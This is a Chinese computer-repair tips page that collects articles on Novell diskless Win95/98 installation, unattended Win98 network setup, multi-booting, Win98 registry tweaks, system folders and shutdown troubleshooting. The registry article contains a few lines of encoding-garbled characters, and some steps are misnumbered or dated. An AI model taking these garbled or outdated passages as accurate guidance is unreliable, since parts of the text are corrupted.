电脑维修 电脑故障维修大全 电脑教程 计算机故障维修网站

更新网址:www.163164.com 或 www.163164.net 或 www.163164.org 或 www.163164.cn

意见建议

电脑故障维修大全 4.5 免费版

常见系统故障 | 电脑小技巧 | 启动故障 | 死机故障
BLOS应用 | DOS系统 | 98故障 | Windows2000
Linux故障 | XP故障 | winnt系统 | unix系统
NOVELL系统 | 病毒木马加解密 | 打印机故障 | 扫描仪故障
电源故障 | 光驱刻录故障 | 局域网故障 | 内存故障
软驱故障 | 鼠标键盘故障 | 声卡故障 | 基础知识
网卡故障 | 网络设备故障 | 无盘网络 | 显示故障
显示器故障 | 硬盘故障 | 主板故障 | CPU故障
网络连接故障 | 数据恢复技术 | 维修精华 | 30秒清除垃圾
作者在电脑维修过程中，遇到过各种各样的问题，每当这时候我就翻书或是上网搜索，总之是费时费力。几次经历之后便有了收集整理电脑故障的想法，于是这个故障大全诞生了。数据库每月更新

    《电脑故障维修大全》搜索查询版：可按故障分类查询，也可用关键字搜索数据库，图文并茂，可以很方便的找到解决办法，注册费20元。

当前版本：2008-5-15 丁相钦 于山东日照莒县 欢迎同乡交流 QQ:3149886 意见建议

智能检测更新： 需要连接互连网

其他作品：《电脑故障大全最新版》 《骗术大全》 《智慧大全》 《创业宝典》 《笑话大全》 《中国象棋大师》 《网页特效专家》 更多作品.....


Novell 4.11无盘Win95/98安装捷径

《一键清理系统垃圾》

返回总目录 目录页 下一页

Novell 4.11无盘Win95/98安装捷径

思路
    1.在生成Win95版本的netSdos.sys(简称net.w95)之前，和该文件大小为0字节时，巧妙调整修改Win95远程启动(rpl)安装相关文件的配置及操作：删除、拷贝等，生成可引导至Win95/DOS状态的net.w95文件。
    2.修改用户注册文件，把Win95整个系统当作一个简单的软件来安装和使用。

    要求

    1.服务器(jxsx－server)和工作站为586/100以上兼容机，16M或32M RAM，网卡PCI或NE2000(本文以PCI为例)。2.Novell版本4.11或以上，工作站3～4台，至少有一台已安装Win95及相关客户软件，即＊.vlm,net.cfg,vlm.exe等。

    一、Win95版本net.w95文件巧妙生成

    1.运行netsetup.exe完成服务器共享的安装设为：jxsx－sever\sys\sbs
    2.修改msbatch.inf文件
    [setup]
    installtype=3
    uninstall=0
    display=1
    [network setup]
    hdboot=0
    rplsetup=1
    network station setup=1
    display network setup=1
    ;installdir=″jxsx\sys\winuser″
    display=1
    3.在无盘工作站1号机上，在DOS 622方式下以admin注册运行
    map f:=sys:\sbs
    f:
    setup /t:f:\temp
    根据安装向导，选择“远程无盘启动方式运行Windows”；
    设置机器(用户)目录f:\winuser(sys为系统卷)
    4.从装有Win95的工作站2号机，以DOS 6.22无盘方式启动至网络(admin注册)，转到f:\winuser目录，观察该目录下当产生config.win文件时暂停1号机的“下一步”安装，编辑config.win文件内容为：
    device=himem.sys
    device=emm386.exe ram
    device=ramdrive.sys 1440/A
    dos=high,umb
    files=64
    lastdrive=z
    同时将sbs下的himem.sys,emm386.exe,ramdrive.sys拷贝至该目录和suboot目录下(emm386.exe文件一定不能少)。
    5.在1号机上继续安装，挂起所有硬件检测，网络安装时只要网卡设置、驱动程序添加正确，其它如协议等概可不管，也无须改动删除等。直到“复制完所有文件”后暂停，切勿选择“完成安装”，这时的suboot目录下有重大“秘密”。
    6.到2号机上的f:\winuser下，这时发现netSdos.sys大小为0字节，说明suboot下的文件尚未打包——即为“秘密”，进入suboot修改：
    1Autoexec.bat文件
        lh lsl
        lh pciodi
        lh ipxodi
        copy a:\command.com c:\
        copy ＊.vlm c:\
        copy vlm.exe c:\
        set comspec=c:\command.com
        c:
        vlm.exe
        f:
        login user
    2删除net.win、net.bak、net.cfg，并且将2号机硬盘c:\net下的pciodi.com、＊.vlm、vlm.exe、net.cfg、lsl.com、ipxodi.com文件拷贝到suboot下，同时复制net.cfg文件为net.bak和net.win。
    7.在1号机上选择“完成安装”，几秒钟后在2号机上运行dir.sys可看到netdos.sys由0变为1.2M左右，说明系统根据suboot下的config.sys、Autoexec.bat的设置将该目录下的所有文件打包到netSdos.sys(即为net.w95)中去了，这时将netSdos.sys、autoexec.bat拷贝至f:\login下，便可无盘引导至Win95/DOS状态了，至此Win95版本的远程自举net.w95文件顺利生成。

    二、把Win95整个系统当作一个简单的软件来安装

    1.在2号机上以无盘进入网络(admin注册)，进入c:\windows，运行subst a: c:\windows——将a:虚拟成为c:\windows目录(一定要做)，运行a:>win.com，打开“我的电脑”图标，在f:\建立winbak文件夹，将c:\windows及其子目录下的所有文件和c:\根目录下的所有＊.bat、＊.sys等改为正常属性进入dos－prompt方式。
    xcopy c:\＊.＊ f:\winbak\ /s/e
attrib c:\＊.＊ ＋s,＋h,＋r
;以免Win95单机不能运行。
attrib f:\winbak\＊.＊ ＋r,＋s,＋h
flag f:\winbak\＊.＊ sh di /s
；设置共享，禁止删除属性。
    2.修改user用户注册文件login script为：
    map display on
    map f:=sys:\
    map s16:=sys:\winbak\windows\
    map s16:=sys:pubcic
    map s16:=f:login
    map root c:=sys:\winbak
    map root a:=sys:\winbak\windows
    comspec=c:\command.com
    3.在f:\login下编辑win.bat:
    login user
    c:
    win.com
    重新启动所有工作站无盘进入网络便大功告成!
    特点：本方法为万能方法，可永久删除共享安装目录(sbs)，减少了繁琐的machines.ini文件的编辑过程；其它软件(如：显卡驱动，声卡驱动等)可在网络上顺利安装——就像在硬盘上一样。

返回

www.163164.com 下载:《一键清理系统垃圾》程序，保持系统的“苗条”身材与运行速度！


Novell局中装Windows 98

《一键清理系统垃圾》

返回总目录 上一页 目录页 下一页

Novell局中装Windows 98

    在一台计算机上安装Windows 98，常常需要花数十分钟的时间，而在很多计算机上逐台安装Windows 98就是不实际的。作者以自己管理的一个Novell网为例，来说明如何在局域网中每台机器上快速安装Windows 98。

    一、在测试安装中安装和配置Windows 98 选择一台工作站，按普通方式单机安装Windows 98，必须保证此安装完全正确并且无任何错误的运行。需注意的是：选择的工作站应该能够代表网络中的大多数机器的配置。一般而言，网络中的工作站具有相同的硬件配置。

    二、根据该测试安装中的设置创建一个安装脚本 使用Windows 98 CD－ROM所带的Batch.exe程序收集该测试安装中的配置信息以生成安装脚本文件Msbatch.inf 。安装脚本文件的本质在于提供安装程序所需要的所有由用户提供的信息，从而实现自动安装。

    1、从Windows 98 CD－ROM盘中或从“Windows 98 Resource Kit"盘中安装Batch Setup 程序，并且从“开始"菜单中启动它。

    2、单击“Gather Now(现在收集)"按钮，从注册表中收集该测试计算机的相关信息。“Batch Setup"程序使用这些信息和它在工作站上找到的而不是猜想出来的配置数据，预先填充每个提问。这就是为什么必须确保测试计算机正常运转，并且在运行Batch Setup程序之前已被正确地配置的原因。在完成这一步骤之后，会看到该按钮下面的“Complete"(完成)。

    3、单击下列每个按钮，“General Setup Options"(一般安装选项)、“Network Options"(网络选项)、“Optional components"(可选组件)和“Advanced Options"(高级选项)，以便修改已包含在安装脚本中的设置。

    4、单击“Save Settings to INF"(把设置保存到INF)，保存自定义安装脚本。“Batch Setup"程序提示输入一个文件名，接受默认文件名“Msbatch.inf"。

    三、把Windows98源文件拷贝到服务器(确保现有的网络中的每台工作站都能登录到服务器)

    1、以超级用户入网，在服务器硬盘建立Win 98子目录，把 Windows98源文件拷贝到此子目录。

    2、拷贝前述安装脚本文件Msbatch.inf到Win 98子目录。

    3、建立账号Set98，设密码为install。

    4、为账号Set98建立注册脚本，内容为：

    attach server / ourcefiles:

    map drive: server / sourcefiles

    drive:setup msbatch.inf

    其中server / sourcefiles：表示NetWare服务器和包含Windows 98源文件的卷。Driver表示你要映射源文件的那个驱动器符号。

    四、在另外工作站上以Set98入网，就会在此工作站自动安装Windows 98。

返回


Win98+Win2000+WinXP三操作系统共同使用安装实录

《一键清理系统垃圾》

Win98+Win2000+WinXP三操作系统共同使用安装实录

2002-01-28　　　　作者：
WinXP已经正式发布了，大家都很想知道WinXP能不能够实现多操作系统引导，答案是肯定的，我已经试验成功了，现在我把我的安装过程告诉大家：
1.首先安装Win98，并且安装常用的软件。这一步我想大家均很熟悉了，这里就不详细介绍了。
2.再安装Win2000，这一步的安装很讲究。
   2.1 把Win2000光盘里面的i386文件夹复制到硬盘上，然后在DOS下安装。
   2.2 现加载smartdrv.exe，然后到i386目录下执行winnt，系统会自动提示。注意!!必须把Win2000安装到另外一个分区并且选择全新安装!
3.安装WinXP
  本人使用的是正式版本的WinXP简体中文版，特别注意：安装时必须停止运行Norton Antivirus，否则不能够安装成功。安装启动以后（提示选择全新安装还是升级安装，一定要选择全新安装(如图)，然后系统会要求输入序列号，接着又一个对话框。注意：一定要选择高级选项中的“我想再安装 过程中选择安装驱动器号和磁盘分区”，如果不选中就不能够安装三操作系统。接着的安装过程中会提示选择安装的磁盘分区，选择一个可以用的空分区就可以了。最后重新启动，重新启动以后就能看到启动菜单了。

    顺便说一下：没有激活的WinXP只能够使用30天，30天以后系统会自动锁定等待激活，现在网络上有很多破解方法，但是有效的基本上没有。WinXP不同于OfficeXP，它是一个操作系统而不是一个应用软件。强行激活以后系统会出现不稳定的情况。


WIN98高级设置技巧几则

《一键清理系统垃圾》

WIN98高级设置技巧几则

    有时由于过多的安装与卸载应用程序，不正常关机，非法操作等，都会造成任务栏被破坏的情况，这时不论你是按WIN键，还是按Ctrl＋Esc，或是用鼠标都不能重现任务栏，即使重启也一样，这时你可以：按“WIN＋R”键，再运行Regedit，打开注册表编辑器，在HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer下，有一个StuckRects主键，把它删除后重启就可以重现可爱的任务栏了。
    2．快速关闭没有反应的程序
    我们常常会碰到应用程序很长一段时间没有响应的情况，最终系统弹出一个对话框，询问你是要等待呢，还是结束任务，还是取消！这时如你希望系统继续处理没有处理完的工作，以正常的方式退出的话，你可以更改这个程序的等待时间来实现快速关闭，方法如下：打开注册表编辑器，在HKEY_CURRENT_USER\desktop分支下，在右边新建一个串值waittokillapptimeout，设其值为1000（毫秒）。
    3．设置应用程序的搜索路径
    如你要执行一个程序，你可以在“运行”对话框中输入一个应用程序名，如winword，它会马上被执行，但如你输入GAME，系统会给出“找不到文件"的警告信息框，这是什么原因呢？原来，当你按回车后，系统会到几个默认的设置路径中去找有没有这个文件，有就执行，没有就报错，这几个默认的设置路径为：
    ●Windows所在目录
    ●Windows\System目录下
    ●当前工作目录下
    ●此程序设置过的PATH路径下
    关键就在于最后一条，WINWORD就满足最后一条，就让我们来看一看这个小秘密的设置，打开注册表编辑器，在HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths下，有一个Winword.exe，其右边有一个PATH，其值正指向这个应用程序的路径。这下子你明白了吧！
    同样，如果你常用GAME这个程序，你可先在注册表中找到这个文件名，在其右侧新建一个串值PATH，再输入其路径，如F:\GAME\GAME.EXE。下次你只要输入GAME，系统就会执行它了。
    4．自动清除文档内容
    在与别人共享一台机器时，你如果不想让他人知道你曾经打开过什么文件，你也许会在每次用完机器后清除“文档”菜单中的内容，可是这样会很麻烦。现在就让笔者告诉你一个小技巧，就是让系统自动清除“文档”菜单中的内容，方法如下：
    打开注册表编辑器，在HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer下，新建一个DWORD类型值:ClearRecentDocesOnExit，设其值为1，下次你用完机器后，只要关机或重启，“文档”菜单中的内容就自动被清除了。


1．All Users文件夹

《一键清理系统垃圾》

1．All Users文件夹

所有用户文件夹，里面记录了Windows 98系统缺省登录时的桌机文件和开始菜单的内容。

2．Application Data文件夹
应用程序数据文件夹。该文件夹中只有Microsoft一个目录。而WINDOWS\Application Data\Microsoft\Internet Explorer\Quick Launch目录中的文件，其实就是任务栏中的快捷方式。

3．Applog文件夹
应用程序逻辑目录。该文件夹中全部是.lgc文件(逻辑文件)，记录的是相关文件运行时要调用的文件、读写地址、输出地址等逻辑信息。如Winamp运行时要调用DLL文件、WIN.INI文件、VXD文件、TTF文件等，并在Applog文件夹中生成Winamp.lgc。LGC文件可以用记事本打开查看。该文件夹中的文件对系统的运行没什么影响。

4．Catroot文件夹
计算机启动辅助测试目录。目录中的文件内容大多是关于计算机启动时检测的硬软件信息，如光驱信息，键盘信息等。

5．Command文件夹
该文件中包括了DOS7.1的所有外部命令。对于想升级DOS 6.22朋友来说，只需把Windows 98的系统文件传到C盘上，然后把Command文件夹中的文件拷至DOS目录中就可以了！

6．Config文件夹
配置文件夹，不过，该文件并不是记录系统的配置情况，而只保存了MIDI乐器的定义文件。

7．Cookies文件夹
其实Cookies是一组网络服务商存储在你硬盘上的一些数据。该目录中的文件记录着你登录过的网站及自己的一些爱好！

8．Crystal文件夹
该文件夹的具体功能我也不太清楚，目录中的内容全是DLL文件。

9．Cursors文件夹
动画图标文件夹。里面包含了Windows自带的动画图标，我们可以往该目录中拷入动画图标文件来作为Windows系统的默认动画图标。

10．Desktop文件夹
桌面文件夹。你想知道桌机上的文件存放在硬盘的什么地方吗？其实就在Desktop文件夹中。

11．Downloaded Program Files文件夹
下载文件文件夹。笔者估计该文件夹中的文件是使用IE下载文件时必需的程序。

12．Drwatson文件夹
华生医生文件夹。不过，该文件中并没有Drwatson这个程序，而只有它的一个HTM文件。

13．Favorites文件夹
“收藏夹”文件夹，我们在浏览网页时，可以把自己喜爱的网址添加到该文件夹中，以后只需在Favorites文件夹中选中相应的网址就可以浏览对应的网页。如果我们要备份收藏夹中的内容，只需备份Favorites文件夹就可以了！

14．Fonts文件夹
字体文件夹。利用该文件夹，我们可以添加和删除字体文件。

15．Forms文件夹
类型文件夹。该文件夹中的Config目录中存放着一些图标文件。

16．Help文件夹
帮助文件的文件夹，里面包括了Windows系统中的大部分帮助文件。

17．History文件夹
历史文件夹。History文件夹中有若干个子文件夹,记录的是最近数十天（最多可记录最近99天）访问的网页等信息。这个文件夹的使用相当独特，不能进行备份，笔者用尽心力也没有解决这个问题。不知那位朋友可以援手？

18．Inf文件夹
安装文件文件夹。这是一个隐藏目录，里面汇集了相当多的INF文件。我们在安装驱动程序时，常常可以看到系统要求我们指定相应的INF，但是许多朋友都不知道INF如何使用，其实INF（Inastll File）的使用相当简单，你只需在指向它的同时单击鼠标右键，然后选择“安装”命令即可完成INF的安装！

19．Java文件夹
在该文件夹下有Classes（种类）和Packages（压缩包）两个子文件夹，其中Packages中包含了一些压缩文件和一些数据文件。

20．Media文件夹
仅见文思意，该文件夹应译为多媒体文件夹,不过，该文件的内容却全是.WAV文件（声音文件）。该文件夹有什么作用呢？你不妨按下面的步骤操作一下：
将一个WAV文件拷入Media文件夹（如Startup.wav），然后打开[控制面板]中的“声音”选项选择要发声的事件，然后选择对应的声音，你将发现刚才拷入的声音文件Startup.wav出现在了候选框中。所以Media文件夹其实是Windows系统默认的声音文件夹。

21．Msapps文件夹
微软应用程序文件夹。该目录中的内容是由计算机中安装的软件决定的。笔者的计算机中，该目录中只有Repostry文件夹，它里面的文件是一个对象关系库，用来保存有关对象之间关系的永久信息。

22．NetHood文件夹
网络覆盖目录。具体功能不清楚。

23．Pif文件夹
程序信息文件目录。Pif文件其实就是DOS程序的快捷方式。双击Pif文件夹中的Cvt.pif文件,回到DOS窗口，并执行将FAT16转换为FAT32的操作。

24．PrintHood文件夹
打印覆盖目录。具体功能不详。

25．Recent文件夹
文档文件夹。你想删除“开始”菜单中“文档”项目中的文件吗？不妨到Recent文件夹中删除其中的文件就行了！

26．Samples文件夹
模板文件夹。该文件夹只有WSH一个目录，WSH(Windows Scripting Host的缩写)目录的文件全是Windows Scripting Host对一些事件处理的范例。你可以双击这些文件查看它们的运行情况。

27．SendTo文件夹
发送文件夹。巧妙利用该文件夹，你可以挖掘出Windows的一些小技巧。下面我们举个小例子：我们都知道，双击Windows中的.txt文件，系统将自动调用记事本程序Notepad.exe（如该txt文件较大，则将调用写字板程序Wordpad.exe）来打开该文件，那么，我们可不可以直接用word来打开txt文件而又不改变文件的关节联呢？其实，利用SendTo文件夹就可以轻松实现：先建立一个Word程序的快捷方式，然后将该快捷方式抟入SendTo文件夹。完成之后，你将鼠标指向要打开的Txt文件，然后单击鼠标右键，再选择右键菜单中“发送到”项目中的“Microsft Word”，即可用Word直接打开txt文件。

28．ShellNew文件夹
新建文件夹。我们都知道用鼠标右击空白区域后，菜单项中会出现“新建”命令，利用此命令我们可以快速建立相应的文件。那么ShellNew文件夹在此过程中起什么作用呢？其实ShellNew文件夹中的文件起的是模板的作用，当你选择“新建”命令中，该命令就将到此目录中寻找对应的模板文件，如果你将这些文件删除，“新建”命令就名存实亡了。

29．Start Menu文件夹
开始菜单文件夹。利用此菜单，你可以往“开始”菜单中添加和删除菜单选项。Start Menu文件夹中的Program文件夹对应“开始”菜单中的“程序（P）”选项。

30．Subscriptions文件夹
订阅文件夹。利用该文件夹中的Microsoft Internet Explorer，你可以在网络中预阅所需要的东西。

31．Spool文件夹
Spool文件夹中有一个Printers目录，当你在进行打印操作时，打印所产生的转换文件就暂存于Printers目录中。

32．Sysbckup文件夹
系统备份文件夹。从文件夹名就可以推测出该文件夹的重要性，如果你不小心将System目录中的DLL文件删除了，再重新安装Windows系统之前，不妨先到Sysbckup目录中查找一下，也许你会有意外的惊喜。我们都知道系统会自动备份注册表，但是那些备份的东西放在哪儿呢，其实就在Sysbckup目录中，不信，你打开该文件夹中的那5个压缩文件看看，里面不就是你期望的注册表的备份吗？

33．System文件夹
系统文件夹。该目录是Windows系统中最重要的文件夹，里面包含了上千个文件（文件数的多少取决于你安装的软件的数量），这是这么安装了软件（如Office 97、VB）之后，该目录中会存放这些软件运行必需的文件，如DLL文件（动态链接库文件）、CPL（控制面板文件）、OLB文件、OCX文件等。这也是为什么即使软件没有安装在C盘，系统目录也会急剧增大的最主要的原因。

34．System32文件夹
基于纯32位的系统文件夹。里面包含了许多虚拟设备文件。

35.Tasks文件夹
计划任务文件夹，该文件中主要存放计划任务的定制程序和你定制的运行计划。合理利用计划任务，可以为我们的工作带来很大的方便和提高我们的效率。比如，你可以定制定时关机等。

36.Temp文件夹
临时文件目录。这里面的内容全是因为需要而临时建立的，如果你想增大硬盘的空间，删除该文件夹中的内容到是一个好办法（该文件夹中的东西对系统的运行不会有丝毫的影响）。不过，如果你用WORD写东西而又忘了存盘，不妨先到Temp文件夹中找找，或许会找回部分资料。

37.Temporary Internet Files文件夹IE下载文件缓冲区。
当你用IE浏览网片时，系统会把浏览过的网页内容自动保存该目录中，方便以后你再打开相同的网页时，加快浏览的速度。不过，该目录中的内容会占用大量的磁盘空间，如果你想增大硬盘的空间，不妨到一定时间贵州省将该目录中的内容删除。

38.Web文件夹
该文件夹存放着系统和安装软件对应的超文本模板、频道的图标和图像等文件。Windows 98的一些外壳介面，主要是由该目录下的超文本模板来完成的。


Win98无法正常关闭的解决方法

《一键清理系统垃圾》

Win98无法正常关闭的解决方法

    Win98界面友好、功能强大，但是在使用过程中难免出现各种各样的问题，特别是使用后无法正常关闭，可真急煞人。不要忙，按照以下方法进行检查，总会找到解决办法的。
   第一步：检查“退出Windows”声音文件
   首先单击“开始”，指向“设置”，单击“控制面板”，然后单击“声音”。然后在“事件”框中，单击“退出Windows”。在“名称”中，单击“（无）”，单击“确定”。关闭计算机。
   如果Win98正常关闭，则问题是由退出声音文件所引起的。要解决这一问题，你可以从备份中恢复声音文件或重新安装提供声音文件的程序，也可以将Win98配置为不播放“退出Windows”声音文件。

   第二步：禁用快速成关机
   快速关机是Win98中的新增功能，可以大大减少关机时间。但是，该功能与某些硬件不兼容，如果计算机中安装了这些硬件，可能会导致计算机停止响应。禁用快速关机步骤：
   1.单击“开始”，单击“运行”，在“打开”框中键入“msconfig”，然后单击“确定”；
   2.单击“高级”，单击以选中“禁用快速关机”复选框，单击“确定”，然后再次单击“确定”；
   3.系统提示重新启动计算机，请重新启动；
   4.关闭计算机，等候关机。如果计算机正常关机，则快速关机功能可能与计算机上所安装的多个硬件设备不兼容，你可以与计算机上所安装设备的厂商联系，并解决该问题。

   第二步：检查“高级电源管理（AMP）”功能
   确定APM是否会引起关机问题：
   1.单击“开始”，指向“设置”，单击“控制面板”，然后双击“系统”
   2.在“设备管理器”选项卡上，双击“系统设备”；
   3.双击设备列表中的“高级电源管理”，单击“设置”选项卡，然后单击以清除“启用电源管理”复选框；
   4.连续单击“确定”，直到返回“控制面板”；
   5.重启动计算机；
   6.关闭计算机，如果计算机正常关机，则问题的原因可能在于APM。请关闭“高级电源管理”功能。

   第四步：文件Bootlog.txt 中是否已列出此问题？
    在Bootlog.txt文件中定位问题：使用文本编辑器，如“记事本”，检查Bootlog.txt文件中的Terminate=条目。这些条目位于文件的结尾，可为问题的起因提供一定的线索。
   如果Bootlog.txt文件的最后一行为EndTerminate=Kernel，Win98就可成功关闭。如果Bootlog.txt文件的最后一行为下列某项条目，请检查所列出的可能原因：
   Terminate=QueryDrivers 内存管理程序有问题。
   Terminate=UnloadNetwork 与Config.sys中的实模式网络驱动程序冲突。
   Terminate=ResetDisplay 可能需要更新视频驱动程序。
   Terminate=RIT 声卡或鼠标驱动程序在与计时器有关的问题。
   Terminate=Win32 与32位程序有关的问题阻塞了线程。

   第五步：Config.sys文件或 Autoexec.bat文件中是否存在冲突？
   确定方法为：
   1.单击“开始”，然后单击“运行”；
   2.在“打开”框中，键入“msconfig”，然后单击“确定”；
   3.单击“诊断启动”；
   4.单击“确定”。系统提示重新启动计算机时，请单击“确定”，如果计算机的启动或关闭不正确，请确定问题是由Config.sys或Autoexec.bat文件的哪一行引起的。
   确定引起问题的行：
   1.重新启动计算机，启动时，按住Ctrl键，从“Startup”菜单中选择“SafeMode”；
   2.单击“开始”，然后单击“运行”；
   3.在“打开”框中，键入“msconfig”，然后单击“确定”；
   4.单击以清除Config.sys和Autoexec.bat选项卡中不含Windows图标行的复选框，使用此Config.sys文件，单击以启用某行；
   5.单击“确定”，当系统提示重新启动计算机时，单击“确定”，如果计算机的启动和关闭都很正常，启用另一行，并重复步骤4、5的操作。
   逐步启用Config.sys文件和Autoexec.bat文件中的行，直到发现问题为止。

   第六步：检查Windows.ini文件中的条目是否正确？
   确定System.ini文件或Win.ini文件中是否存在冲突：
   1.单击“开始”，然后单击“运行”；
   2.在“打开”框中，键入“msconfig”，然后单击“确定”；
   3.在“常规”选项卡中，通过单击清除“选择性启动”中的所有复选框，单击选中“处理System.ini文件”复选框，单击选中“处理Win.ini文件”复选框。
   4.单击“确定”。系统提示重新启动计算机时，请单击“确定”。
   如果计算机无法正常启动或关闭，则System.ini或Win,ini文件中的条目存在问题。仔细检查每一条目，以确定原因。确定引发问题的条目之后，请删除此条目或在此条目前加（；）以禁用此条目或修改此条目即可。

   第七步：是否存在内部系统问题
   确定是否存在内部系统问题：
   1.单击“开始”。然后单击“运行”；
   2.在“打开”框中，键入“msconfig”，然后单击“确定”；
   3.单击“高级”，请除“高级疑难解答设置”中的“禁用系统ROM中断点”、“禁用虚拟HDIRQ”和“EMM不包含A000_FFFF”复选框，然后单击“确定”；
   4.系统提示重新启动计算机时，请单击“确定”。
   如果计算机正常启动，请重复以上步骤，然后在步骤3中选中某一复选框。重复此过程，直到发现计算机无法正常启动为止。

   第八步：“启动”文件夹中的程序是否与启动过程冲突？
    确定“启动”文件夹中的程序是否与启动过程冲突：
   1.单击“开始”，然后单击“运行”；
   2.在“打开”框中”中，键入“msconfig”，然后单击“确定”；
   3.通过单击选中“装载启动组项目”复选框；
   4.单击“确定”。系统提示重新启动计算机时，请单击“确定”。
   如果计算机无法正常启动或关闭，则问题的起因可能在于从“启动”文件夹中予以加载的程序，将其清除即可。


Win98下闪存盘常见故障

《一键清理系统垃圾》

Win98下闪存盘常见故障

    现在的闪存盘市场非常火爆，品牌也是层出不穷，一般的闪存盘都可以在Windows 98以上的操作系统上即插即用，在Windows 98下则需要安装驱动，但是有一些朋友遇到了这样的情况——在Windows 98下装好驱动后不能找到盘符。现在我们就教教大家具体的解决方法。

    正常情况下，启动进入Windows 98系统后，接入USB闪存盘（这里以三星的USB盘为例），屏幕会显示找到新硬件，根据提示一步一步装闪存盘的驱动，一切正常，装好后打开我的电脑，还是原来的状态，却发现看不到USB盘，为什么呢，不是装好驱动了吗？不要急，我们还要完成下面的步骤：回到桌面，用鼠标右键点击我的电脑，选择属性，进入设备管理器，在磁盘驱动器下面我们可以看到比原来的多了一个SAMSUNG Flash Disk的设备，这就是你的USB闪存盘了。

    再次双击进入其属性，我们可以看到，在它的属性窗口有四个选项：断开、可删除、同步数据传输和Int 13单元，可删除选项前面系统默认是没有打勾的。我们只要在可删除选项前面点上勾，确定，再重新启动，OK！问题解决，可移动的磁盘盘符出来了，格式化以后就马上能用了。


WIN98注册表编辑器的常用操作

《一键清理系统垃圾》

WIN98注册表编辑器的常用操作

1999-04-17 00:00:00· ·

--------------------------------------------------------------------------------
  ∽⒉岜肀嗉魇且桓隹梢匀媚愀谋湎低匙⒉嵘瓒ǖ母呒豆ぞ遅IN98注册表编辑器的常用操作注册表编辑器是一个可以让你改变系统注册设定的高级工具，有经验的Windows用户可以通过编辑注册表改变系统设定。
    启动注册表编辑器的方法是执行Windows文件夹下的REGEDIT.EXE。如果注册表中有错误，计算机可能不能正常运行。如果发生这种情况，可以将注册表信息恢复到上次启动计算机时的状态。下面详细介绍Win98注册表编辑器常用的操作。
    一、恢复注册表
    1.单击“开始”，再单击“关闭系统”；
    2.单击“重新启动计算机并切换到MS－DOS方式”，然后单击“是”；
    3.进入Windows目录下。例如，如果你的Windows安装在C:Windows目录下，应键入以下内容CD C:WINDOWS后回车；
    4.在MS－DOS模式下键入C:WINDOWSCOMMANDSCANREG/RESTORE后回车。
    按照上述步骤，可以将注册表恢复到最后一次启动计算机时的状态。
    二、将注册表中的所有内容导出到一个文本文件中
    1.在注册表编辑器中单击“我的电脑”将导出所有注册表信息，或者单击一个文件夹仅仅导出该文件夹下内容的注册信息；
    2.在“注册表”菜单上单击“导出注册表文件”；
    3.单击“浏览”为导出的文件寻找一个存储位置，即文件夹，然后为之输入一个文件后保存。
    这样导出的注册表信息文件，可以在任何一种文本编辑器中编辑。
    三、导入或局部导入注册表
    1.在“注册表”菜单中，单击“导入注册表文件”；
    2.单击“浏览”找到要导入的文件，然后单击“打开”。
    四、添加主键
    1.打开注册表列表，找到要添加主键的文件夹；
    2.右击要加入主键的文件夹；
    3.将鼠标指向“编辑”菜单下的“新建”，然后单击“主键”；
    4.新的主键是以一个临时名字显示的，为新的主键输入一个名字，然后回车即可；如果添加新的主键后，导致了计算机不能正确启动的情况，可以恢复注册表信息。
    五、添加键值
    1.打开注册表列表，选中要添加新键值的文件夹；
    2.右击要添加新键值的文件夹；
    3.将鼠标指向“新建”，然后单击需要添加键值的类型。这些类型包括“字符串值”、“二进制值”和“DWORD”值；
    4.新添加的键值以一个临时键值显示，为新添加的键值输入一个新的值，然 爻导纯伞?天津　杨玉琦


windows98se 不能关机的原因及解决方法

《一键清理系统垃圾》

windows98se 不能关机的原因及解决方法

     windows98se 不能关机的现象并不少见，而且专门针对此问题有一个补丁程序，但是好像这个补丁也不能从根本上解决问题。所以我们只能从系统的关机原理上想办法了。

    当Windows系统关闭时，在关机的过程中需要完成下列工作：

    1.完成所有的写盘作业。

    2.刷新磁盘缓存(Cache)。

    3.运行关闭窗口的代码程序，关闭所有当前正在运行的应用。

    4.将所有保护模式下的驱动转变成实模式。

    在Windows 98 SE里的关机问题有可能是由下列原因引起的，相应的解决办法如下：

    1.非正常关闭的应用。关机前要关闭所有正在运行的程序，包括关闭任何在实模式下加载的TSR程序、关闭开机时从启动组自动启动的程序、关闭任何非系统引导必需的第三方设备驱动程序。

    可以通过检查config.sys 、autoexec.bat、win.ini文件确定并删除其中加载的有关实模式程序，还可以使用Microsoft系统配置工具Msconfig.exe(在c:\windows\system目录下)检查有哪些运行的程序，取消后对系统进行干净引导(指只加载最少的驱动程序、并在启动时不运行启动组中的任何程序进行系统引导)。如果干净引导可以解决问题，你就可以利用系统配置工具确定引起不能正常关机的程序。

    2.安装了不兼容的、已经损坏的或者有冲突的设备驱动程序。

    可以对利用bootlog.txt分析。

    正常的最后一行一般含有EndTerminate=Kernel, win98

    不正常现象有：

    terminate=query drivers 内存管理程序问题

    terminate=Unload Network 与config.sys中的实模式网络驱动程序有冲突

    terminate=reset display 视频驱动的问题

    terminate=rit 声卡或鼠标驱动与计时器有冲突

    terminate=win32与32位程序有关的问题注册了线程

    3.用于退出窗口的声音文件已经被破坏。可以在“控制面板-声音”中重新选定其他声音文件或设为“无”。

    4.硬件设备配置不正确或者已经损坏。

    将任何可能引起问题的硬件删除或使之失效。

    可以采用下列步骤使设备管理器中的某些设备无效：

    进入“控制面板”，“系统”的“设备管理”标签下，双击包含你想选定的设备，单击该设备，然后单击属性。在“常规”标签下，选定“在此硬件配置文件中禁用”复选框，然后单击“确定”。

    重新引导系统。

    如果问题解决，逐个启用上述禁用的设备，并检查有没有设备冲突：

    在设备管理器中双击包含你想选定的设备，单击该设备，然后单击属性。 在“常规”标签下逐个启用上述禁用的设备。在“资源”标签下检查“冲突的设备列表”的内容。注意，并非所有设备都有“资源”标签。

    如果通过上述步骤，确定了是某一个硬件引起非正常关机问题，应与该设备的代理商联系，或者通过Internet与厂商联系，以更新驱动程序。

    如果问题仍然没有解决，可以单击“开始>程序>附件>系统工具>系统信息”然后单击“工具”菜单，单击“自动跳过驱动程序代理”工具以启用所有被禁用设备的驱动程序。

    5.BIOS配置不正确。

    在PnP/PCI Configurations选项中，有一项Assign IRQ VGA，如果你装的是Win98SE版本，关不了机，跟这个选项可能有关，要把它打开。

    6.由于高级电源管理或者高级配置和电源接口(Advanced Configuration and Power Interface)的设置不正确。

